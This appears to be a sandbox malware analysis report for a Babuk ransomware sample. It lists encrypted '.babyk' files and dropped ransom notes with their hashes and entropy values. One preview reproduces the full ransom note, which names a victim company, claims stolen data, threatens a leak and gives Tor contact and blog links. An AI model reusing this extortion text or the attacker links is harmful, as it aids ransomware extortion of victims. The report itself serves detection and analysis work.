                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1048744
                                                                            Entropy (8bit):7.999815359243783
                                                                            Encrypted:true
                                                                            SSDEEP:24576:SZBPbxtUHg9c3SFksZX/hTcY+qtVQuhFb1UZaN0rwCWV:SXPbAHgYmkO/iCQuhx6lc
                                                                            MD5:0CBE9F68B539D33444986E6F2659E7A9
                                                                            SHA1:0F365560A0C82B00E5E081F7B7885B73CA211937
                                                                            SHA-256:BD37BFBB56E6999271462F7ACAC2DA7610D20ACB65CCCD8917C86019E4B35A4C
                                                                            SHA-512:1DC7FAFB51548D03D6814C5A54C4E081A10BD0210ED05853A9B98586A7CCEECF90F6BF3FB6F763C4691279FBF4443B9042DBABEB5FCF0BC408D179E261BE8FCE
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Comms\UnistoreDB\USStmp.jtx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1048744
                                                                            Entropy (8bit):7.999824269258601
                                                                            Encrypted:true
                                                                            SSDEEP:24576:olwbgi0TUDNowRbbIyr2oEsWXy5sUW8aMs4Fui9Eyjq:lKgDNoEbONi5O8xs4F99EQq
                                                                            MD5:B50E0D38038B7512F11527BB749CAB19
                                                                            SHA1:57D2783E3E09DCA053F4FE5EB69C0A69C3EC49F4
                                                                            SHA-256:41A18C527EF3431DF8D3A9E70ADEEAD245715CBCB2B38BF4D70D4C7456383440
                                                                            SHA-512:927DEDA1A3C5DC5FB3F875BAE2879B44CD7D9138C572E1F11A18057E9EDE3965DF9CD3863F981F32A9DDE0ECF679203C7CB0A4C71FE9C6A125CC8BBDC86FE491
                                                                            Malicious:true
                                                                            C:\Users\user\AppData\Local\Comms\Unistore\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Comms\Unistore\data\AggregateCache.uca.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):172
                                                                            Entropy (8bit):6.599632141519615
                                                                            Encrypted:false
                                                                            SSDEEP:3:aWGNt3nCD2u2ExOE0ez832kr1CRgmYhRNS3h900ZwDjc9UxNvEEn:aWGdCDH2Ej832NYhgKyMjc90vtn
                                                                            MD5:44BD1893A9388DC54CC766FF5CFFE022
                                                                            SHA1:A770C5826650E71A2AF2B1A6BE2DE72A6293E3E0
                                                                            SHA-256:013333605A9F2F9962B00C8580681A520FC833210DF91AA13EE5152415639D30
                                                                            SHA-512:6123FB394F4B659604A3CC3FCF6CABB2A25144A5C08037318594B56473B95351F22716CCDC60A605C398FA2C962D096D6766148C59E0B6EE7A5E683C5C026E57
                                                                            Malicious:false
                                                                            Preview: bj....... ..u..t.>2...'.dn.Y.4_.y.v...k...{ lY.Q&..Z.t.r.....c.#...da.=..O...`..t5.....y.....=.Fag.|.Hw..x..K.6LN....~$.*....?.1).l....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Comms\Unistore\data\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):2157
                                                                            Entropy (8bit):7.905921609289494
                                                                            Encrypted:false
                                                                            SSDEEP:48:AGd7xBnBq+RP/WL6SXnljYzt/bG5hYs/NJ:AG9DntSXntuqh1/NJ
                                                                            MD5:1A4D838242678107AC77241A12F8E79F
                                                                            SHA1:9EDCB1A6B0B40BFB7B07485A3D5941A73895F776
                                                                            SHA-256:D50CBFA1586C9ED580B7821D428EF4839B3270813A6B45FD421256E24DB03D71
                                                                            SHA-512:8CCBDF6669B799D082FC45737A159521023F0856224DD241FF77B6637BFE84582FAE23A363FB8DC852C91F7BC56DDF9A8532596AFBC2CC68B174CC40079CBCE2
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\ConnectedDevicesPlatform\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\DBG\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft Help\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\MicrosoftEdge\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\MicrosoftEdge\SharedCacheContainers\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\MicrosoftEdge\SharedCacheContainers\MicrosoftEdge_DNTException\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\MicrosoftEdge\SharedCacheContainers\MicrosoftEdge_DNTException\container.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.6084448961614495
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlSrK63Ugz1inFU7+Rre/qwb2tUy9tt2zAsal+QoHNLUxNvEEn:EfZ18VeSwmptiaKNL0vtn
                                                                            MD5:1CC2D60122B4248F21DA1993BDB42F01
                                                                            SHA1:D279A63F9FC4AD19F0C0E4F1E8B3D82B5C5ABDE5
                                                                            SHA-256:E9FA016A0E8AE39617FF5F5ACD91FBBA533FBED434611647998282AF6D8E6B84
                                                                            SHA-512:FAB3A02F902658CFBE41CC9CFF354F4D15E67A351FFDC027BD48D46C75FC1EB76B5098EC9BECBBE16C84F2756C3ACA531D95412EF2C42424742FE32A92E2A5B9
                                                                            Malicious:false
                                                                            Preview: [non-printable encrypted bytes] ...choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\addinutil.exe.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):371
                                                                            Entropy (8bit):7.383050183930177
                                                                            Encrypted:false
                                                                            SSDEEP:6:hIteo+H19K1phCN+TpqaVpA/wriAbLUXcI4Z8QSRs2CKEBf6fiNOoNArf24i//+Z:qL+H198phD1qf/w2Aac7ZgUKanNOaArb
                                                                            MD5:2CBFBCEB0B648BBC239B02A376D102F6
                                                                            SHA1:1470510516B3260CEB5B3426A57EC48FB2AC9EF0
                                                                            SHA-256:15F46BA5F6FA95D7917F56927200F5F2EA851CFCA79783FA2CC9CB9DAE3BD4D5
                                                                            SHA-512:96B97CD62DA28EC2D5B3F970321C71E2657C3E89FC2B0FBF1C70E4B906BF59A13EA09785FF349D6C258346AF697C3B3836819079AB17AAB7D555A9BBC5A2BC9E
                                                                            Malicious:false
                                                                            Preview: [non-printable encrypted bytes] ...choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\unarchiver.exe.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):556
                                                                            Entropy (8bit):7.66870574939786
                                                                            Encrypted:false
                                                                            SSDEEP:12:VsYMmMfwhcABNYqqvVmTaHdcIPi6EvbQTO36IK7y:VlMZI5BmuaHdcIqzcTO36IK7y
                                                                            MD5:1711EB9EEE0DD9FD88BFF3D0059BBCD0
                                                                            SHA1:3A74B5BF52A1D9D687D93B5117B784F35F5C6860
                                                                            SHA-256:AA4B522801FEB4DB857A9E1D9B50CF31BAFB0072C3BEF47C7A24B3DB0E96A0A4
                                                                            SHA-512:928136C062FFDED83325E10D6CBE77AFAB2275942194714AAE68AFC444F8050A725BFAE2F8F49ED5C61492BEC484FAC4B6E5AC8A1B972090351753A1D1615C49
                                                                            Malicious:false
                                                                            Preview: [binary data] choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\NGenTask.exe.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):810
                                                                            Entropy (8bit):7.739380938745983
                                                                            Encrypted:false
                                                                            SSDEEP:12:T5N5fG98uUSI9ktoU2C9nYozQqTqJ0VMps9y+z+7w+zmbYLKdkHjOtrQKlJ:NNhG90SI9h/C9nxzQCGm9y+zOfm4615D
                                                                            MD5:B08C853E617BEC10B6FF22BA2A9D4990
                                                                            SHA1:CEEC659F7F909E3DF54A271374E619E8A63CC452
                                                                            SHA-256:5C834F289F402CAF0340136CF1FCAC637781300847035C927DD53C6CD273DF99
                                                                            SHA-512:3E0E6BAE5B24E1CF04B1669BA8DC140532F2F81DF5CFC5A5414D243A8D7C6C76E57918FA0C1105900CB7C1AF2C787BE799B4B196ECEEB376053AA8AF8C8265F3
                                                                            Malicious:false
                                                                            Preview: [binary data] choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):3985
                                                                            Entropy (8bit):7.943965924464039
                                                                            Encrypted:false
                                                                            SSDEEP:96:zdQktm0gTyYkJWuGdWRnxiQuaYOSN+5NKhdds6ZiUglKtlVM:z1Y0PpTGQRnYrOY+5wfds6ZiUea4
                                                                            MD5:39372168978E86FFD44CE23B7D345185
                                                                            SHA1:D18DB835947712D8FD5A26BBEB858D7FBB181320
                                                                            SHA-256:F7E38375CDA318447BF7F9FB4BFCD064D318D34D6662B138D06061801562C4B8
                                                                            SHA-512:54C07B29D4EBCE109AC68AB873478E8CDE4133168F5754E774F8B61853E36DC8EFB0E0B42846027CDE684021EE156B85C3C1D34D40373C1AB3AAF25E6CF46CE6
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sdiagnhost.exe.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):5971
                                                                            Entropy (8bit):7.969091391979781
                                                                            Encrypted:false
                                                                            SSDEEP:96:8nlBzdExzF2+AEsUWAaTF4b/GdG1kc6svTt4Ie+U/PpjTZTYK1VbCd/GQgZ63FM5:UlBmpFR04QGiFsvJq/Qyle51N9i
                                                                            MD5:652D1A90718F7DD7FB09EFE305A75FD4
                                                                            SHA1:30D2FA4C0F643DB6E285ACE77DA5C88E4B6AC827
                                                                            SHA-256:EFFB9F74A63B6801C6518988CDAA34D377CDD943E7B9B188C4C5141508CA929E
                                                                            SHA-512:B033FA2C992322A14E9F384A7CEDA40337635D499EF40E95436B6BB7D1FD30A9E47B0D797271F7BA99AB7627CB655956ABB8F48D39CFB5ACCA65920B5345E29F
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\ngen.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):501
                                                                            Entropy (8bit):7.5304874982917775
                                                                            Encrypted:false
                                                                            SSDEEP:6:EHrLWGmIOac7/DZaxOrpUT0SPQ6T39VC5pE0Bueu9bRUc0imD1Y3WbvOibnL0vtn:ELCF6QSOrU0SPQ6TCELNbd0x23WbO
                                                                            MD5:F4F5805B97395628A648F5D68FD824BB
                                                                            SHA1:39131D9211E0C768855DC3657470B3A84A971276
                                                                            SHA-256:849B707EC426C0616FA38038882CB9A4AD7472E6F9A0868367A013354EC107F2
                                                                            SHA-512:714492F52680AEC0F6E1C20B6279EF18D4EA6047FED1DAEAD49493E8CE1B5E828A4E473B443EB7EE483DF2AC395526885FEECA24C95795DA7F7F07E80EA21884
                                                                            Malicious:false
                                                                            Preview: [binary data] choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):2311
                                                                            Entropy (8bit):7.90864981130882
                                                                            Encrypted:false
                                                                            SSDEEP:48:PjLvfXBk4Nmew2c9/L//WssCY8pZCGd3NV75Fl5Q2tYXcs30N9dhD0p/t/q:XBk2z4xLnWssJ8pZCQ3N/Ogh9dhD0p/s
                                                                            MD5:ED456F3DDBC59D552294564903D87972
                                                                            SHA1:E92E3A5BB1B7C866E97C7BFFC80D7E99CFF7AE39
                                                                            SHA-256:3CDBC8A8E87814B8DD62353319F390D14587D0C02E613E19F373ABF8BB634853
                                                                            SHA-512:1C38C643D8CAC35A693E04DED28A2BA437027A6361A6169C7523A103EE39360CA3FD66911D493F0C7AFB2DE5F79CE1D3742EA75E598D120541645B71BE4667DE
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):11128
                                                                            Entropy (8bit):7.9839994320727214
                                                                            Encrypted:false
